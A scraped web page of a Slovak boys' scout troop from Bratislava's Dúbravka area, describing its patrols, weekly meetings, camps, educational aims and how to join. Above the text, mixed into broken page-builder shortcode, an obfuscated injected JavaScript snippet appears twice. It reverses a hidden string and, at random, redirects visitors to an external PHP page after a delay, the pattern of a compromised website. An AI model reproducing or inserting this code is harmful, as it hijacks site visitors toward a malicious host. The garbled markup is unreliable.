)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom“ video_url=““ video_aspect_ratio=“16:9″ video_webm=““ video_mp4=““ video_ogv=““ video_preview_image=““ overlay_color=““ overlay_opacity=“0.5″ video_mute=“yes“ video_loop=“yes“ fade=“yes“ border_size=“0px“ border_color=““ border_style=“solid“ padding_top=“0″ padding_bottom=“0″ padding_left=“0px“ padding_right=“0px“ hundred_percent=“yes“ equal_height_columns=“no“ hide_on_mobile=“no“ menu_anchor=““ class=““ id=““]
Loading...
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top“ video_url=““ video_aspect_ratio=“16:9″ video_webm=““ video_mp4=““ video_ogv=““ video_preview_image=““ overlay_color=““ overlay_opacity=“0.5″ video_mute=“yes“ video_loop=“yes“ fade=“no“ border_size=“0px“ border_color=““ border_style=“solid“ padding_top=“20″ padding_bottom=“20″ padding_left=“30px“ padding_right=“30px“ hundred_percent=“no“ equal_height_columns=“no“ hide_on_mobile=“no“ menu_anchor=““ class=““ id=““]

Kto sme?

Naša skupina, skautský oddiel, je určená pre chlapcov vo veku od 11 do 17 rokov z Dúbravky, Devínskej Novej Vsi a priľahlých mestských častí. V súčasnosti sme rozdelení na dve menšie skupinky, skautské družiny, mladších skautov(Gremlini) a starších roverov (Draci).

Gremlini (11-16 rokov) – streda 17:00 – 19:00 v klubovni

S činnosťou nášho oddielu sú spojené aj víkendové akcie, ktoré väčšinou organizujeme cez sobotu. Počas roku mávame aj viacero viacdňových celovíkendových výletov spojených buď s prespaním v prírode alebo  máme ubytovanie zabezpečené na chate. Cez letné prázdniny sa účastníme spolu s ostatnými oddielmi dvojtýždňového letného. tábora, ktorý je vyvrcholením našej celoročnej činnosti. Na letný stanový tábor sa členovia nášho oddielu pripravujú počas celého roku a účasť na tábore je podmienená pravidelnou dochádzkou.

K čomu vedieme deti?

Cieľom skautingu je vychovať mladých, aktívnych a sebavedomých ľudí. Pričom skauting rozvíja zručnosti, ktoré v dnešnej dobe voláme soft skills, komunikácia, kreativita, tímová spolupráca a analytické myslenie.

Ako s nimi pracujeme?

Jedinečnosť skautskej výchovy spočíva v jej metódach, ktoré si zakladajú najmä na tom, že deti sa snažíme učiť formou aktivít. Skaut sa zapája do činnosti prostredníctvom svojej družiny čiže menšej skupinky, kde postupne objavuje a prijíma aj zodpovednosť a učí sa samostatnosti pod vedením dospelých vedúcich nasmerujúc sa na rozvoj charakteru, spoľahlivosti a schopnosti spolupracovať a viesť druhých. Skaut sa zdokonaľuje pomocou systému postupných nadväzujúcich programov a skúšok.

 Kedy sa môžem prihlásiť?

Naša činnosť nekončí a nezačína školským rokom, činnosť skautského oddielu je oveľa pestrejšia a dlhodobo na seba nadväzujúca. Napriek tomu všetkému sa aj my podriaďujeme prirodzeným spoločenským cyklom a nováčikov prijímame najmä na začiatku školského roku. Prihlásenie do oddielu je možne po konzultácii s vedúcim oddiel aj počas školského roku.

Ak Vás činnosť nášho oddielu zaujala a chcete sa dozvedieť viac, tak kontaktuje oddielového vedúceho Borisa Palovčíka – Bobra, na maily: